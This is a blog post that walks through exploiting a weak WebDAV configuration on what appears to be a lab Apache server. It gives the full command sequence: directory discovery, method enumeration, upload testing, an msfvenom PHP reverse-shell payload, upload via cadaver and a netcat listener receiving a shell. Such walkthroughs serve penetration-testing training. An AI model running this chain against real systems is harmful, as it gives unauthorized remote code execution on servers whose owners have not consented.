Friday, February 26, 2021

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint.

80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) DAV/2)

Next we need to find out the webdav directory. For this we will use the 'dirb' utility to look for the directory.

root@kali:~# dirb http://192.168.155.142/ /usr/share/wordlists/dirb/common.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Feb 26 19:05:28 2021
URL_BASE: http://192.168.155.142/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt

-----------------

GENERATED WORDS: 4612
---- Scanning URL: http://192.168.155.142/ ----
+ http://192.168.155.142/cgi-bin/ (CODE:403|SIZE:296)                     
==> DIRECTORY: http://192.168.155.142/dav/
+ http://192.168.155.142/index (CODE:200|SIZE:891)                        
+ http://192.168.155.142/index.php (CODE:200|SIZE:891)                    
+ http://192.168.155.142/phpinfo (CODE:200|SIZE:48107)                    
+ http://192.168.155.142/phpinfo.php (CODE:200|SIZE:48119)

dirb found the directory '/dav/' which we will use to test. We can use nmap again to find out all of the supported methods on the webdav directory using an nmap script.

sam@kali:~$ nmap -p80 --script http-methods --script-args http-methods.test-all=true,http-methods.url-path='/dav/' 192.168.155.142
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-26 19:38 CST
Nmap scan report for 192.168.155.142
Host is up (0.00040s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-methods: 
|   Supported Methods: OPTIONS GET HEAD POST DELETE TRACE PROPFIND PROPPATCH COPY MOVE LOCK UNLOCK PUT CONNECT
|   Potentially risky methods: DELETE TRACE PROPFIND PROPPATCH COPY MOVE LOCK UNLOCK PUT CONNECT
|_  Path tested: /dav/

Nmap done: 1 IP address (1 host up) scanned in 0.46 seconds
sam@kali:~$

As you can see we have access to methods like DELETE, COPY, MOVE and PUT at our disposal. What we want to do is upload a file to the server and get a reverse shell. For our next test we will use the utility 'davtest' to check the permissions we have on the server.

sam@kali:~$ davtest -url http://192.168.155.142/dav -cleanup -quiet
                                                                                                                                                                     
/usr/bin/davtest Summary:                                                                                                                                            
Created: http://192.168.155.142/dav/DavTestDir_mJBJrXiU                                                                                                              
PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.pl                                                                                         
PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.jsp
PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.jhtml
PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.shtml
PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.asp
PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.aspx
PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.php
PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.cfm
PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.html
PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.cgi
PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.txt
Executes: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.php
Executes: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.html
Executes: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.txt
DELETED: http://192.168.155.142/dav/DavTestDir_mJBJrXiU

sam@kali:~$ 

davtest cam back with some intresting results. We where able to upload a wide range of files to the remote host, but if we look only three of those file types are we able to execute. The file type we are concerned with is the '.php' exstension. We can generate a reverse shell PHP payload with msfvenom to upload to the remote host.

sam@kali:~$ msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.155.128 LPORT=8888 -f raw > payload.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 30691 bytes

sam@kali:~$

After we generate the payload, we move on to another tool we can use to upload the file to the remote host. The 'cadaver' tool allows us to connect to the webdav instance and gives us a bunch of commands to execute. The command we are interested in is the 'PUT' command.

sam@kali:~$ cadaver http://192.168.155.142/dav
dav:/dav/> ?
Available commands: 
 ls         cd         pwd        put        get        mget       mput       
 edit       less       mkcol      cat        delete     rmcol      copy       
 move       lock       unlock     discover   steal      showlocks  version    
 checkin    checkout   uncheckout history    label      propnames  chexec     
 propget    propdel    propset    search     set        open       close      
 echo       quit       unset      lcd        lls        lpwd       logout     
 help       describe   about      
Aliases: rm=delete, mkdir=mkcol, mv=move, cp=copy, more=less, quit=exit=bye
dav:/dav/> put /home/sam/payload.php
Uploading /home/sam/payload.php to `/dav/payload.php':                                                                                                               
Progress: [=============================>] 100.0% of 30686 bytes succeeded.                                                                                          
dav:/dav/>

Our file uploaded sucessfully. Now we can move on to visiting the url 'http://192.168.155.142/dav/payload.php' and execute the payload giving us a reverse connect back shell on the box.

sam@kali:~$ nc -nvlp 8888
Listening on [0.0.0.0] (family 0, port 8888)
Connection from 192.168.155.142 36422 received!
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data

No comments:

Post a Comment

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...